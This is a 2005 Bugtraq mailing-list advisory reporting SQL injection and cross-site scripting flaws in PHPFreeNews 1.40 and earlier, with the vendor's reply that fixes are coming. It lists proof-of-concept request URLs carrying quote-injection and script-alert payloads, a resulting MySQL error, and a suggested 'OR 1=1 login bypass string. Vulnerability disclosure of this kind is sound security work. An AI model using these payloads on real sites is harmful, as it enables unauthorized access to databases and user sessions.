PHPFreeNews V1.40 and prior Multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: PHPFreeNews V1.40 and prior Multiple Vulnerabilities
From: h4cky0u@xxxxxxxxx
Date: 17 Aug 2005 19:24:45 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PHPFreeNews V1.40 and prior Multiple Vulnerabilities

SEVERITY:
=========
High

SOFTWARE:
=========
PHPFreeNews
http://www.phpfreenews.co.uk/

INFO:
=====
PHPFreeNews is a free PHP Script which allows you to display news headlines and 
articles on your website.

DESCRIPTION:
============
PHPFreeNews Version V1.40 and earlier are vulnerable to various SQL Injection 
and XSS attacks. Here are some examples:


--==-- SQL Injection --==--


http://www.site.com/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='

http://www.site.com/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result 
resource in \somepath\www\phpfn\Inc\ListingFunctions.php on line 92
Query failed : You have an error in your SQL syntax. Check the manual that 
corresponds to your MySQL server version for the right syntax to use near '''' 
IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority, PostDate


Also http://www.site.com/phpfn/Inc/AccessControl.php type for user and pass 
some sql injection string like "OR" 1=1 and you will get an error.



--==-- XSS --==--

http://www.site.com/phpfn/NewsCategoryForm.php?NewsMode=";><script>alert('Found 
By Matrix_Killer');</script>&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match='><script>alert('Matrix_Killer
 OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell
 Year');</script>

http://www.site.com/phpfn/SearchResults.php?Match=1&NewsMode=";><script>alert('0_o
 Please StoP !');</script>&SearchNews=Search&CatID=0

http://www.site.com/phpfn/SearchResults.php?Match=";><script>alert('Matrix_Killer
 -> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0


VENDOR STATUS
=============

Vendor contacted on the 17th of August.

Vendor Reply (17th of August) - All the bugs have been fixed and will be 
included in the next release.

CREDITS: 
======== 

This vulnerability was discovered and researched by -

matrix_killer of h4cky0u Security Forums. 


mail : matrix_k at abv.bg

web : http://www.h4cky0u.org


Co-Researcher -

h4cky0u of the h4cky0u Security Forums.

mail : h4cky0u@xxxxxxxxx

web : http://www.h4cky0u.org


Greets to all omega-team members + krassswr,EcLiPsE and all who support us !!!

ORIGINAL:
=========
http://h4cky0u.org/viewtopic.php?t=1977

Prev by Date: runcms highlight.php hole
Next by Date: Re: Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product
Previous by thread: MDKSA-2005:141 - Updated evolution packages fixes format string vulnerabilities
Next by thread: DevC++ V.4.9.9.2 NULL BYTE INSERTION / OBFUSCATION FLAW (by rgod)
Index(es):
- Date
- Thread